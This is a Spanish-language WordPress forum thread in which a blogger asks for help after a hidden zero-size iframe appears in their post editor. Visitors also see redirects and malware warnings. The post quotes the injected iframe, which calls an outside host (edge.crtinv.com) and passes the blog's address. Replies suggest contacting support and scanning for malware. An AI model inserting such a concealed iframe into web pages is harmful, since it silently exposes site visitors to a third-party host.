apareció código en editor antes de escribir nada y doble enlace a Twit y FB

Hola. agradecería su ayuda. Estaba entrando al editor para poner una nueva entrada y al cambiar a modo HTML y aperecia un código con un iframe pero yo no había escrito nada, sólo apareció y quisiera saber qué pasa. Hace una semana encontré en la parte de publicitarse dos enlaces a twitter y dos a Facebook pero yo solo he puesto uno a cada red, descidí borrarlos y luego enlacé nuevamente pero sólo con twitter. Algunos amigos me han dicho que a veces mi blog va lento o que no pueden entrar y que les aparece que se se está redireccionando pero se queda la página en blanco, otras veces me dicen que les aparece la advertencia que la pagina es «pelifrosa». El código que me apareció en mi editor es el siguiente:

<iframe style="width: 0px; height: 0px; display: none;" src="//edge.crtinv.com/getData.html?d=https%3A%2F%2Fpocamadrenews.wordpress.com" width="320" height="240"></iframe>

Gracias por su ayuda!

Si aún aparece ese código en tu blog, por favor comunica con el soporte: support@wordpress.com

Parece ser que es algo de la red, quizás tengas un malware o algo. Primero yo pasaría el antivirus porque aqui: «http://jsunpack.jeek.org/dec/go?report=54bf46a8e26f1cd2f4389701e00cfc19e011e71c» explica algo del asunto y otras webs que tienen dicho código es porque son fallos del «whois»… mira a ver si puedes acceder a los DNS o algo. Suerte ;)

Gracias. @airodyssey, ya no sólo apareció una vez, hice captura de pantalla.

@sntjulio Gracias, ya pasé mi antivirus y panda active scan (on line) pero no detectan nada. No se si haya afectado haber navegado anónimamente esos días por lo que dices del whois. Voy a revisar el artículo que mencionas. saludos!

• El debate ‘apareció código en editor antes de escribir nada y doble enlace a Twit y FB’ está cerrado y no admite más respuestas.